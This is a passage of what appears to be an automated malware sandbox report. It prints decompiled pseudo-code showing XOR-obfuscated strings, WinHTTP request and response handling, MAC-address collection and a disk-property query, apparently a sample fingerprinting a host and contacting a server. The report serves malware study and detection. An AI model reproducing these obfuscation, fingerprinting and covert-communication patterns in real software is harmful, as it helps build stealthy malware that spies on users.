                                                                				_v324 = 0xe267e263;
                                                                				_v320 = 0xe27be272;
                                                                				_v316 = 0xe21de21f;
                                                                				_v312 = 0xe21ae202;
                                                                				_v308 = 0xe275e214;
                                                                				_v304 = 0xe237e27a;
                                                                				_v300 = 0xe236e235;
                                                                				_v296 = 0xe27fe23b;
                                                                				_v292 = 0xe204e227;
                                                                				_v288 = 0xe208e201;
                                                                				_v284 = 0xe24ce20b;
                                                                				_v280 = 0xe224e246;
                                                                				_v276 = 0xe21be200;
                                                                				_v272 = 0xe206e205;
                                                                				_v268 = 0xe242e209;
                                                                				_v264 = 0xe258e259;
                                                                				_v260 = 0xe241e25e;
                                                                				_v256 = 0xe240e25c;
                                                                				_v252 = 0xe243e24c;
                                                                				_v248 = 0xe259e243;
                                                                				_v244 = 0xe249e241;
                                                                				_v240 = 0xe228e25a;
                                                                				_v236 = 0xe21be21d;
                                                                				_v232 = 0xe20de21f;
                                                                				_v228 = 0xe2aee2e9;
                                                                				_v224 = 0xe2b0e2b7;
                                                                				_v220 = 0xe2abe2b3;
                                                                				_v216 = 0xe2b1e2b5;
                                                                				_v212 = 0;
                                                                				do {
                                                                					_t43 = _t337 - 0x1dc0; // -7616
                                                                					 *(_t391 + _t337 * 2 - 0x160) =  *(_t391 + _t337 * 2 - 0x160) ^ _t43;
                                                                					_t337 = _t337 + 1;
                                                                				} while (_t337 < 0x48);
                                                                				_v32 = 0;
                                                                				_v212 = 0;
                                                                				_v28 = 7;
                                                                				_v48 = 0;
                                                                				E010945A0(0x10cab20);
                                                                				_v174 = 0xe22ee20d;
                                                                				_v170 = 0xe22ae238;
                                                                				_t339 = 0;
                                                                				_v166 = 0xe229e228;
                                                                				_v162 = 0xe268e227;
                                                                				_v158 = 0xe267e27d;
                                                                				_v154 = 0xe26be27a;
                                                                				_v150 = 0xe21ae264;
                                                                				_v146 = 0xe221e227;
                                                                				_v142 = 0xe23ee234;
                                                                				_v138 = 0xe220e225;
                                                                				_v134 = 0xe21be274;
                                                                				_v130 = 0xe277e202;
                                                                				_v126 = 0xe269e269;
                                                                				_v122 = 0xe26be274;
                                                                				_v118 = 0xe27de267;
                                                                				_v114 = 0xe236e209;
                                                                				_v110 = 0xe257e20e;
                                                                				_v106 = 0xe258e256;
                                                                				_v102 = 0xe21de244;
                                                                				_v98 = 0xe253e250;
                                                                				_v94 = 0xe249e241;
                                                                				_v90 = 0;
                                                                				do {
                                                                					_t77 = _t339 - 0x1dc0; // -7616
                                                                					 *(_t391 + _t339 * 2 - 0xaa) =  *(_t391 + _t339 * 2 - 0xaa) ^ _t77;
                                                                					_t339 = _t339 + 1;
                                                                				} while (_t339 < 0x2a);
                                                                				_t84 =  &_v174; // 0xe22ee20d
                                                                				_t340 = _t84;
                                                                				_v90 = 0;
                                                                				_t383 = _t340 + 2;
                                                                				do {
                                                                					_t236 =  *_t340;
                                                                					_t340 = _t340 + 2;
                                                                				} while (_t236 != 0);
                                                                				_t87 =  &_v174; // 0xe22ee20d
                                                                				E010A7844( &_v428, E010A7877( &_v48, _t340 - _t383 >> 1, _t87, _t340 - _t383 >> 1));
                                                                				_t345 =  &_v356;
                                                                				_t91 = _t345 + 2; // 0xe231e203
                                                                				_t384 = _t91;
                                                                				do {
                                                                					_t240 =  *_t345;
                                                                					_t345 = _t345 + 2;
                                                                				} while (_t240 != 0);
                                                                				E010A7844( &_v404, E010A796A( &_v428,  &_v356, _t345 - _t384 >> 1));
                                                                				E01094572( &_v428);
                                                                				E01094572( &_v48);
                                                                				_push(0);
                                                                				_t385 = 2;
                                                                				_t352 = 6;
                                                                				_t246 = E010A67CA(_t352, _t385);
                                                                				_t389 = LoadLibraryA;
                                                                				_push(0);
                                                                				_push(0);
                                                                				_t390 = "Winhttp.dll";
                                                                				_t247 =  &_v404;
                                                                				_push(0);
                                                                				if(_t246 == 0) {
                                                                					_push(0);
                                                                				} else {
                                                                					_push(4);
                                                                				}
                                                                				_t248 =  >=  ? _v404 : _t247;
                                                                				_t249 = LoadLibraryA(_t390); // executed
                                                                				_t250 = GetProcAddress(_t249, "WinHttpOpen"); // executed
                                                                				_t251 =  *_t250( >=  ? _v404 : _t247); // executed
                                                                				_v60 = _t251;
                                                                				if(_t251 != 0) {
                                                                					_push(0x1388);
                                                                					_push(0x1388);
                                                                					_push(0x7d0);
                                                                					_push(0x7d0);
                                                                					_push(_t251);
                                                                					 *(GetProcAddress(LoadLibraryA(_t390), "WinHttpSetTimeouts"))();
                                                                					_push(0);
                                                                					_push(_v20);
                                                                					_push(_v12);
                                                                					_push(_v60);
                                                                					_t260 =  *(GetProcAddress(LoadLibraryA(_t390), "WinHttpConnect"))();
                                                                					_v20 = _t260;
                                                                					if(_t260 != 0) {
                                                                						if(_a16 == 0) {
                                                                							_v194 = 0;
                                                                							_t386 = 0;
                                                                							__eflags = 0;
                                                                							_v210 = 0xe215e208;
                                                                							_v206 = 0xe213e216;
                                                                							_t358 = 0;
                                                                							_v202 = 0xe274e26b;
                                                                							_v198 = 0xe276e268;
                                                                							_v84 = 0xe20ee210;
                                                                							_v80 = 0xe217e211;
                                                                							_v76 = 0;
                                                                							do {
                                                                								_t132 = _t358 - 0x1dc0; // -7616
                                                                								 *(_t391 + _t358 * 2 - 0x50) =  *(_t391 + _t358 * 2 - 0x50) ^ _t132;
                                                                								_t358 = _t358 + 1;
                                                                								__eflags = _t358 - 4;
                                                                							} while (_t358 < 4);
                                                                							_push(0);
                                                                							_push(0);
                                                                							__eflags = 0;
                                                                							_push(0);
                                                                							_v76 = 0;
                                                                							_push(E010454F1( &_v210));
                                                                							_t269 =  &_v84;
                                                                						} else {
                                                                							_v192 = 0xe215e208;
                                                                							_t380 = 0;
                                                                							_v188 = 0xe213e216;
                                                                							_v184 = 0xe274e26b;
                                                                							_v180 = 0xe276e268;
                                                                							_v176 = 0;
                                                                							_v74 = 0xe20ee210;
                                                                							_v70 = 0xe217e211;
                                                                							_v66 = 0;
                                                                							do {
                                                                								_t114 = _t380 - 0x1dc0; // -7616
                                                                								 *(_t391 + _t380 * 2 - 0x46) =  *(_t391 + _t380 * 2 - 0x46) ^ _t114;
                                                                								_t380 = _t380 + 1;
                                                                							} while (_t380 < 4);
                                                                							_push(0x800000);
                                                                							_push(0);
                                                                							_push(0);
                                                                							_v66 = 0;
                                                                							_push(E010454F1( &_v192));
                                                                							_t269 =  &_v74;
                                                                						}
                                                                						_t271 = GetProcAddress(LoadLibraryA(_t390), "WinHttpOpenRequest"); // executed
                                                                						_t272 =  *_t271(_v20, _t269, _a4); // executed
                                                                						_v12 = _t272;
                                                                						if(_a40 > 0) {
                                                                							_v40 = 0xe22ee203;
                                                                							_v24 = 0;
                                                                							_v36 = 0xe228e22d;
                                                                							_v32 = 0xe220e22d;
                                                                							_v28 = 0xe267e27c;
                                                                							_t386 = E010454F1( &_v40);
                                                                							E010A77D5( &_v380, _t323,  &_a24);
                                                                							 *_t392 = 0x20000000;
                                                                							_t326 =  >=  ? _v380 :  &_v380;
                                                                							_push(0xffffffff);
                                                                							_push( >=  ? _v380 :  &_v380);
                                                                							_push(_v12);
                                                                							 *(GetProcAddress(LoadLibraryA(_t390), "WinHttpAddRequestHeaders"))();
                                                                							E01094572( &_v380);
                                                                						}
                                                                						E010943E9( &_v428, _a12);
                                                                						if(_v412 > 0) {
                                                                							_v52 = 0xe22ee203;
                                                                							_v48 = 0xe237e22c;
                                                                							_t374 = 0;
                                                                							_v44 = 0xe22be221;
                                                                							_v40 = 0xe26ae232;
                                                                							_v36 = 0xe230e23c;
                                                                							_v32 = 0xe22ee23a;
                                                                							_v28 = 0xe26de276;
                                                                							_v24 = 0;
                                                                							do {
                                                                								_t170 = _t374 - 0x1dc0; // -7616
                                                                								 *(_t391 + _t374 * 2 - 0x30) =  *(_t391 + _t374 * 2 - 0x30) ^ _t170;
                                                                								_t374 = _t374 + 1;
                                                                							} while (_t374 < 0xe);
                                                                							_t386 =  &_v52;
                                                                							_v24 = 0;
                                                                							E010A77D5( &_v380,  &_v52,  &_v428);
                                                                							 *_t392 = 0x20000000;
                                                                							_t316 =  >=  ? _v380 :  &_v380;
                                                                							_push(0xffffffff);
                                                                							_push( >=  ? _v380 :  &_v380);
                                                                							_push(_v12);
                                                                							 *(GetProcAddress(LoadLibraryA(_t390), "WinHttpAddRequestHeaders"))();
                                                                							E01094572( &_v380);
                                                                						}
                                                                						E01094572( &_v428);
                                                                						_t362 = _v12;
                                                                						if(_t362 != 0) {
                                                                							if(_a8 != 0) {
                                                                								_t387 = _a8;
                                                                								_t190 = _t387 + 1; // 0x1
                                                                								_v64 = _t190;
                                                                								do {
                                                                									_t279 =  *_t387;
                                                                									_t387 = _t387 + 1;
                                                                									__eflags = _t279;
                                                                								} while (_t279 != 0);
                                                                								_t386 = _t387 - _v64;
                                                                								__eflags = _t386;
                                                                								_push(0);
                                                                								_push(_t386);
                                                                								_push(_t386);
                                                                								_push(_a8);
                                                                								_push(0xffffffff);
                                                                								_push(0);
                                                                							} else {
                                                                								_push(0);
                                                                								_push(0);
                                                                								_push(0);
                                                                								_push(0);
                                                                								_push(0);
                                                                								_push(0);
                                                                							}
                                                                							_t281 = GetProcAddress(LoadLibraryA(_t390), "WinHttpSendRequest"); // executed
                                                                							_t282 =  *_t281(_t362); // executed
                                                                							if(_t282 != 0) {
                                                                								_t287 = GetProcAddress(LoadLibraryA(_t390), "WinHttpReceiveResponse"); // executed
                                                                								_t288 =  *_t287(_v12, 0); // executed
                                                                								if(_t288 != 0) {
                                                                									while(1) {
                                                                										_v16 = _v16 & 0x00000000;
                                                                										_t291 = GetProcAddress(LoadLibraryA(_t390), "WinHttpQueryDataAvailable"); // executed
                                                                										_t292 =  *_t291(_v12,  &_v16); // executed
                                                                										if(_t292 == 0) {
                                                                											goto L43;
                                                                										}
                                                                										_t293 = _v16;
                                                                										_t419 = _t293;
                                                                										if(_t293 != 0) {
                                                                											_push(_t293 + 1);
                                                                											_t295 = E010218C3(_t386, _t419);
                                                                											_v56 = _t295;
                                                                											if(_t295 != 0) {
                                                                												E01024A10(_t389, _t295, 0, _v16 + 1);
                                                                												_t392 = _t392 + 0xc;
                                                                												_push( &_v88);
                                                                												_push(_v16);
                                                                												_push(_v56);
                                                                												_push(_v12);
                                                                												if( *(GetProcAddress(LoadLibraryA(_t390), "WinHttpReadData"))() != 0) {
                                                                													_t388 = _v56;
                                                                													_t366 = _v56;
                                                                													_v32 = _v32 & 0x00000000;
                                                                													_v28 = 0xf;
                                                                													_v48 = 0;
                                                                													_v64 = _t366 + 1;
                                                                													do {
                                                                														_t302 =  *_t366;
                                                                														_t366 = _t366 + 1;
                                                                													} while (_t302 != 0);
                                                                													E01094686( &_v48, _t388, _t366 - _v64);
                                                                													_t386 = _a20;
                                                                													E010944B8(_a20, E01096B70( &_v380, _a20,  &_v48));
                                                                													E01094615( &_v380);
                                                                													E01094615( &_v48);
                                                                												}
                                                                												if(_v88 != 0 && _v16 > 0) {
                                                                													continue;
                                                                												}
                                                                											}
                                                                										}
                                                                										goto L43;
                                                                									}
                                                                								}
                                                                							}
                                                                							L43:
                                                                							_push(_v12);
                                                                							 *(GetProcAddress(LoadLibraryA(_t390), "WinHttpCloseHandle"))();
                                                                						}
                                                                						_push(_v20);
                                                                						 *(GetProcAddress(LoadLibraryA(_t390), "WinHttpCloseHandle"))();
                                                                					}
                                                                					_t262 = GetProcAddress(LoadLibraryA(_t390), "WinHttpCloseHandle"); // executed
                                                                					 *_t262(_v60); // executed
                                                                				}
                                                                				E01094572( &_v404);
                                                                				E01094572( &_a24);
                                                                				return _v56;
                                                                			}
                                                                0x010a7063
                                                                0x010a7069
                                                                0x010a706d
                                                                0x010a7070
                                                                0x010a7072
                                                                0x010a7075
                                                                0x010a7078
                                                                0x010a7082
                                                                0x010a708c
                                                                0x010a7096
                                                                0x010a70a0
                                                                0x010a70aa

                                                                APIs
                                                                • LoadLibraryA.KERNELBASE(Winhttp.dll,WinHttpOpen,?,00000000,00000000,00000000,00000000,00000000,E231E201,E231E1FF,00000000,.,.,.,010CAB20,?), ref: 010A73B3
                                                                • GetProcAddress.KERNEL32(00000000), ref: 010A73BC
                                                                • LoadLibraryA.KERNEL32(Winhttp.dll,WinHttpSetTimeouts,00000000,000007D0,000007D0,00001388,00001388), ref: 010A73E0
                                                                • GetProcAddress.KERNEL32(00000000), ref: 010A73E3
                                                                • LoadLibraryA.KERNEL32(Winhttp.dll,WinHttpConnect,?,?,?,00000000), ref: 010A73F8
                                                                • GetProcAddress.KERNEL32(00000000), ref: 010A73FB
                                                                • LoadLibraryA.KERNEL32(Winhttp.dll,WinHttpOpenRequest,?,E20EE210,?,00000000,00000000,00000000,00000000), ref: 010A7500
                                                                • GetProcAddress.KERNEL32(00000000), ref: 010A7503
                                                                • LoadLibraryA.KERNEL32(Winhttp.dll,WinHttpAddRequestHeaders,?,?,000000FF,01093978), ref: 010A7572
                                                                • GetProcAddress.KERNEL32(00000000), ref: 010A7575
                                                                • LoadLibraryA.KERNEL32(Winhttp.dll,WinHttpAddRequestHeaders,?,?,000000FF,?,?), ref: 010A762B
                                                                • GetProcAddress.KERNEL32(00000000), ref: 010A762E
                                                                • LoadLibraryA.KERNEL32(Winhttp.dll,WinHttpSendRequest,?,00000000,000000FF,00000000,?,?,00000000,?), ref: 010A7688
                                                                • GetProcAddress.KERNEL32(00000000), ref: 010A768B
                                                                • LoadLibraryA.KERNEL32(Winhttp.dll,WinHttpReceiveResponse,?,00000000), ref: 010A76A2
                                                                • GetProcAddress.KERNEL32(00000000), ref: 010A76A5
                                                                • LoadLibraryA.KERNEL32(Winhttp.dll,WinHttpQueryDataAvailable,?,00000000), ref: 010A76C2
                                                                • GetProcAddress.KERNEL32(00000000), ref: 010A76C5
                                                                • LoadLibraryA.KERNEL32(Winhttp.dll,WinHttpReadData,?,?,00000000,?), ref: 010A7712
                                                                • GetProcAddress.KERNEL32(00000000), ref: 010A7715
                                                                • LoadLibraryA.KERNEL32(Winhttp.dll,WinHttpCloseHandle,?), ref: 010A7793
                                                                • GetProcAddress.KERNEL32(00000000), ref: 010A7796
                                                                • LoadLibraryA.KERNEL32(Winhttp.dll,WinHttpCloseHandle,?,?), ref: 010A77A3
                                                                • GetProcAddress.KERNEL32(00000000), ref: 010A77A6
                                                                • LoadLibraryA.KERNEL32(Winhttp.dll,WinHttpCloseHandle,?), ref: 010A77B3
                                                                • GetProcAddress.KERNEL32(00000000), ref: 010A77B6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                • Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp
                                                                • Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp
                                                                • Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp
                                                                • Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: 6$B$.$!+$#%$% $'!$'h$()$,7$2/$2j$4>$56$8*$:.$<0$>d$AI$AI$CY$F$$LC$PS$VX$WinHttpAddRequestHeaders$WinHttpCloseHandle$WinHttpConnect$WinHttpOpen$WinHttpOpenRequest$WinHttpQueryDataAvailable$WinHttpReadData$WinHttpReceiveResponse$WinHttpSendRequest$WinHttpSetTimeouts$Winhttp.dll$YX$Z($\@$^A$cg$g}$hv$hv$ii$kt$kt$r{$tk$vm$ya$y~$z7$zk$}g
                                                                • API String ID: 2574300362-3482149607
                                                                • Opcode ID: c0ce472ba6c2fe1822619ed1725b58c1e9ae70ea3ae61827acc8ef0f10754a54
                                                                • Instruction ID: 2e13ee9ce326a03f2c31aaf3602942a25128d56d407831aaea45d99523e13a0e
                                                                • Opcode Fuzzy Hash: c0ce472ba6c2fe1822619ed1725b58c1e9ae70ea3ae61827acc8ef0f10754a54
                                                                • Instruction Fuzzy Hash: 4A1269B8D00219AADF25DFE4CD94BEEBB74FF44300F4081D9E559AA240DB399A81CF52
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 54%
                                                                			E010AE466(intOrPtr __ecx, void* __eflags) {
                                                                				intOrPtr _v8;
                                                                				char _v12;
                                                                				intOrPtr* _v16;
                                                                				intOrPtr* _v20;
                                                                				char _v24;
                                                                				char _v28;
                                                                				char _v32;
                                                                				intOrPtr _v36;
                                                                				signed int _v40;
                                                                				char _v56;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __ebp;
                                                                				intOrPtr* _t48;
                                                                				struct HINSTANCE__* _t52;
                                                                				_Unknown_base(*)()* _t53;
                                                                				void* _t54;
                                                                				_Unknown_base(*)()* _t57;
                                                                				void* _t58;
                                                                				intOrPtr _t63;
                                                                				intOrPtr _t77;
                                                                				intOrPtr _t79;
                                                                				intOrPtr _t84;
                                                                				intOrPtr _t88;
                                                                				intOrPtr _t93;
                                                                				intOrPtr _t95;
                                                                				intOrPtr _t96;
                                                                				intOrPtr* _t97;
                                                                				intOrPtr _t98;
                                                                				intOrPtr _t99;
                                                                				intOrPtr* _t108;
                                                                				void* _t124;
                                                                				signed int _t126;
                                                                				intOrPtr* _t128;
                                                                				char _t129;
                                                                				intOrPtr* _t130;
                                                                				void* _t131;
                                                                
                                                                				_t95 = __ecx;
                                                                				_push(0x12);
                                                                				_v8 = __ecx;
                                                                				_v12 = 0x288;
                                                                				_t48 = E010282C5();
                                                                				_t125 = _t48;
                                                                				_push(0x288);
                                                                				_v20 = _t48;
                                                                				_v32 = 0;
                                                                				_v28 = 0;
                                                                				_v24 = 0;
                                                                				_t128 = E010282C5();
                                                                				_v16 = _t128;
                                                                				if(_t128 != 0) {
                                                                					_t52 = LoadLibraryA("Iphlpapi.dll"); // executed
                                                                					_t53 = GetProcAddress(_t52, "GetAdaptersInfo"); // executed
                                                                					_t54 =  *_t53(_t128,  &_v12); // executed
                                                                					if(_t54 != 0x6f) {
                                                                						L13:
                                                                						_t57 = GetProcAddress(LoadLibraryA("Iphlpapi.dll"), "GetAdaptersInfo"); // executed
                                                                						_t58 =  *_t57(_t128,  &_v12); // executed
                                                                						_t126 = 0x18;
                                                                						if(_t58 == 0) {
                                                                							_t97 = _t128;
                                                                							_t130 = _v20;
                                                                							do {
                                                                								_push( *(_t97 + 0x199) & 0x000000ff);
                                                                								_push( *(_t97 + 0x198) & 0x000000ff);
                                                                								_push( *(_t97 + 0x197) & 0x000000ff);
                                                                								_push( *(_t97 + 0x196) & 0x000000ff);
                                                                								_push( *(_t97 + 0x195) & 0x000000ff);
                                                                								E010979DE(_t130, "%02X:%02X:%02X:%02X:%02X:%02X",  *(_t97 + 0x194) & 0x000000ff);
                                                                								_t108 = _t130;
                                                                								_v36 = 0xf;
                                                                								_t131 = _t131 + 0x20;
                                                                								_v56 = 0;
                                                                								_v40 = _v40 & 0x00000000;
                                                                								_t29 = _t108 + 1; // 0x10ae84e
                                                                								_t124 = _t29;
                                                                								do {
                                                                									_t77 =  *_t108;
                                                                									_t108 = _t108 + 1;
                                                                								} while (_t77 != 0);
                                                                								E01094686( &_v56, _t130, _t108 - _t124);
                                                                								_t79 = _v28;
                                                                								_push( &_v56);
                                                                								if(_v24 == _t79) {
                                                                									_push(_t79);
                                                                									E010A60F4( &_v32);
                                                                								} else {
                                                                									E010944ED(_t79);
                                                                									_v28 = _v28 + _t126;
                                                                								}
                                                                								E01094615( &_v56);
                                                                								_t97 =  *_t97;
                                                                							} while (_t97 != 0);
                                                                							_t128 = _v16;
                                                                							_t95 = _v8;
                                                                						}
                                                                						E010282A8(_t128);
                                                                						E010A5AB8(_t95,  &_v32);
                                                                						_t129 = _v32;
                                                                						if(_t129 != 0) {
                                                                							_t63 = _v28;
                                                                							if(_t129 != _t63) {
                                                                								_t96 = _t63;
                                                                								do {
                                                                									E01094615(_t129);
                                                                									_t129 = _t129 + _t126;
                                                                								} while (_t129 != _t96);
                                                                								goto L26;
                                                                							}
                                                                							goto L27;
                                                                						}
                                                                					} else {
                                                                						E010282A8(_t128);
                                                                						_push(_v12);
                                                                						_t84 = E010282C5();
                                                                						_t128 = _t84;
                                                                						_v16 = _t84;
                                                                						if(_t128 != 0) {
                                                                							goto L13;
                                                                						} else {
                                                                							E010282A8(_t125);
                                                                							E010A5AB8(_t95,  &_v32);
                                                                							_t129 = _v32;
                                                                							if(_t129 != 0) {
                                                                								_t88 = _v28;
                                                                								_t126 = 0x18;
                                                                								if(_t129 != _t88) {
                                                                									_t98 = _t88;
                                                                									do {
                                                                										E01094615(_t129);
                                                                										_t129 = _t129 + _t126;
                                                                									} while (_t129 != _t98);
                                                                									goto L26;
                                                                								}
                                                                								goto L27;
                                                                							}
                                                                						}
                                                                					}
                                                                				} else {
                                                                					E010282A8(_t125);
                                                                					E010A5AB8(_t95,  &_v32);
                                                                					_t129 = _v32;
                                                                					if(_t129 != 0) {
                                                                						_t93 = _v28;
                                                                						_t126 = 0x18;
                                                                						if(_t129 != _t93) {
                                                                							_t99 = _t93;
                                                                							do {
                                                                								E01094615(_t129);
                                                                								_t129 = _t129 + _t126;
                                                                							} while (_t129 != _t99);
                                                                							L26:
                                                                							_t129 = _v32;
                                                                							_t95 = _v8;
                                                                						}
                                                                						L27:
                                                                						asm("cdq");
                                                                						E01094A9F(_t95, _t126, _t129, (_v24 - _t129) / _t126 * 0x18);
                                                                					}
                                                                				}
                                                                				return _t95;
                                                                			}

                                                                APIs
                                                                • LoadLibraryA.KERNELBASE(Iphlpapi.dll,GetAdaptersInfo,00000000,00000000,?,00000000,?), ref: 010AE4F2
                                                                • GetProcAddress.KERNEL32(00000000), ref: 010AE4F9
                                                                • GetAdaptersInfo.IPHLPAPI(?,?,?,?,?,?,?,?,?,010AE84D,?,00000000,?), ref: 010AE4FF
                                                                • LoadLibraryA.KERNEL32(Iphlpapi.dll,GetAdaptersInfo,00000000,00000000,?,?,?,?,?,?,?,?,?,010AE84D,?,00000000), ref: 010AE56D
                                                                • GetProcAddress.KERNEL32(00000000), ref: 010AE574
                                                                • GetAdaptersInfo.IPHLPAPI(?,?,?,?,?,?,?,?,?,010AE84D,?,00000000,?), ref: 010AE57A
                                                                  • Part of subcall function 010A60F4: __EH_prolog.LIBCMT ref: 010A60F9
                                                                • _Deallocate.LIBCONCRT ref: 010AE66C
                                                                  • Part of subcall function 010282A8: _free.LIBCMT ref: 010282BB
                                                                  • Part of subcall function 01094615: _Deallocate.LIBCONCRT ref: 01094624
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                • Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp
                                                                • Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp
                                                                • Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp
                                                                • Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp
                                                                Similarity
                                                                • API ID: AdaptersAddressDeallocateInfoLibraryLoadProc$H_prolog_free
                                                                • String ID: %02X:%02X:%02X:%02X:%02X:%02X$GetAdaptersInfo$Iphlpapi.dll
                                                                • API String ID: 502533160-2818122367
                                                                • Opcode ID: 336aee18a1c28a2f0e99c8ef4379d2a7db13bec7e763b24b9ba74611ea4643ee
                                                                • Instruction ID: c582848d518db4d134f3ebfccc0972a4f3da7c506ee45013d84e13f1c382b474
                                                                • Opcode Fuzzy Hash: 336aee18a1c28a2f0e99c8ef4379d2a7db13bec7e763b24b9ba74611ea4643ee
                                                                • Instruction Fuzzy Hash: 73510C72E001265FDF51EBF8C8909FEBBF8AF19640F44006AE994F7241EA745E055BE0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 95%
                                                                			E010AE67A(signed int* __ecx, void* __edx) {
                                                                				long _v8;
                                                                				long _v12;
                                                                				long _v16;
                                                                				void _v20;
                                                                				struct _OVERLAPPED* _v24;
                                                                				struct _OVERLAPPED* _v28;
                                                                				void _v32;
                                                                				signed int _v36;
                                                                				signed int _v40;
                                                                				char _v56;
                                                                				short _v58;
                                                                				intOrPtr _v62;
                                                                				intOrPtr _v66;
                                                                				intOrPtr _v70;
                                                                				intOrPtr _v74;
                                                                				intOrPtr _v78;
                                                                				intOrPtr _v82;
                                                                				intOrPtr _v86;
                                                                				intOrPtr _v90;
                                                                				short _v94;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				void* _t63;
                                                                				void* _t67;
                                                                				long _t68;
                                                                				signed int _t72;
                                                                				signed int _t73;
                                                                				void* _t75;
                                                                				void* _t77;
                                                                				void* _t85;
                                                                				signed int _t87;
                                                                				intOrPtr* _t89;
                                                                				void* _t97;
                                                                				void* _t99;
                                                                				signed int* _t100;
                                                                				void* _t101;
                                                                
                                                                				_t97 = __edx;
                                                                				_v94 = 0xe21de21c;
                                                                				_v90 = 0xe21fe26c;
                                                                				_t100 = __ecx;
                                                                				_v86 = 0xe22de214;
                                                                				_v82 = 0xe234e23f;
                                                                				_t87 = 0;
                                                                				_v78 = 0xe22ae221;
                                                                				_v74 = 0xe227e22b;
                                                                				_v70 = 0xe23fe208;
                                                                				_v66 = 0xe239e227;
                                                                				_v62 = 0xe261e235;
                                                                				_v58 = 0;
                                                                				do {
                                                                					_t11 = _t87 - 0x1dc0; // -7616
                                                                					 *(_t101 + _t87 * 2 - 0x5a) =  *(_t101 + _t87 * 2 - 0x5a) ^ _t11;
                                                                					_t87 = _t87 + 1;
                                                                				} while (_t87 < 0x12);
                                                                				_v58 = 0;
                                                                				_t63 = CreateFileW( &_v94, 0, 3, 0, 3, 0, 0); // executed
                                                                				_t99 = _t63;
                                                                				if(_t99 != 0xffffffff) {
                                                                					_v24 = 0;
                                                                					_v32 = 0;
                                                                					_v28 = 0;
                                                                					asm("xorps xmm0, xmm0");
                                                                					_v8 = 0;
                                                                					asm("movlpd [ebp-0x10], xmm0"); // executed
                                                                					_t67 = DeviceIoControl(_t99, 0x2d1400,  &_v32, 0xc,  &_v20, 8,  &_v8, 0); // executed
                                                                					__eflags = _t67;
                                                                					if(__eflags != 0) {
                                                                						_t68 = _v16;
                                                                						_push(_t68);
                                                                						_v12 = _t68;
                                                                						_t85 = E010218C3(_t97, __eflags);
                                                                						__eflags = _t85;
                                                                						if(_t85 == 0) {
                                                                							_t85 = 0;
                                                                							__eflags = 0;
                                                                						} else {
                                                                							E01024A10(_t99, _t85, 0, _v12);
                                                                						}
                                                                						_t72 = DeviceIoControl(_t99, 0x2d1400,  &_v32, 0xc, _t85, _v12,  &_v8, 0); // executed
                                                                						__eflags = _t72;
                                                                						if(_t72 != 0) {
                                                                							_t73 =  *(_t85 + 0x18);
                                                                							__eflags = _t73;
                                                                							if(_t73 != 0) {
                                                                								_t44 =  &_v40;
                                                                								 *_t44 = _v40 & 0x00000000;
                                                                								__eflags =  *_t44;
                                                                								_t98 = _t85 + _t73;
                                                                								_t89 = _t85 + _t73;
                                                                								_v36 = 0xf;
                                                                								_v56 = 0;
                                                                								_v12 = _t89 + 1;
                                                                								do {
                                                                									_t75 =  *_t89;
                                                                									_t89 = _t89 + 1;
                                                                									__eflags = _t75;
                                                                								} while (_t75 != 0);
                                                                								E01094686( &_v56, _t98, _t89 - _v12);
                                                                								_t77 = E010A54A5( &_v56, _t100);
                                                                								_t100[4] = _t100[4] & 0x00000000;
                                                                								_t56 =  &(_t100[5]);
                                                                								 *_t56 = _t100[5] & 0x00000000;
                                                                								__eflags =  *_t56;
                                                                								E01094728(_t100, _t77);
                                                                								E01094615( &_v56);
                                                                								goto L17;
                                                                							}
                                                                							_t100[4] = _t100[4] & _t73;
                                                                							_t100[5] = 0xf;
                                                                							 *_t100 = _t73;
                                                                							goto L17;
                                                                						} else {
                                                                							_t100[4] = _t100[4] & _t72;
                                                                							_t100[5] = 0xf;
                                                                							 *_t100 = _t72;
                                                                							__eflags = _t85;
                                                                							if(_t85 == 0) {
                                                                								L18:
                                                                								__eflags = _t99;
                                                                								if(_t99 != 0) {
                                                                									E010AE828(_t99); // executed
                                                                								}
                                                                								L20:
                                                                								return _t100;
                                                                							}
                                                                							L17:
                                                                							L010218BE(_t85);
                                                                							goto L18;
                                                                						}
                                                                					}
                                                                					_t100[4] = 0;
                                                                					_t100[5] = 0xf;
                                                                					 *_t100 = 0;
                                                                					goto L18;
                                                                				}
                                                                				_t100[4] = 0;
                                                                				_t100[5] = 0xf;
                                                                				 *_t100 = 0;
                                                                				goto L20;
                                                                			}

                                                                APIs
                                                                • CreateFileW.KERNELBASE(E21DE21C,00000000,00000003,00000000,00000003,00000000,00000000,?,00000000,?), ref: 010AE6F1
                                                                • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,010AE858,00000008,?,00000000), ref: 010AE73A
                                                                • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,00000000,00000000,?,00000000), ref: 010AE790
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
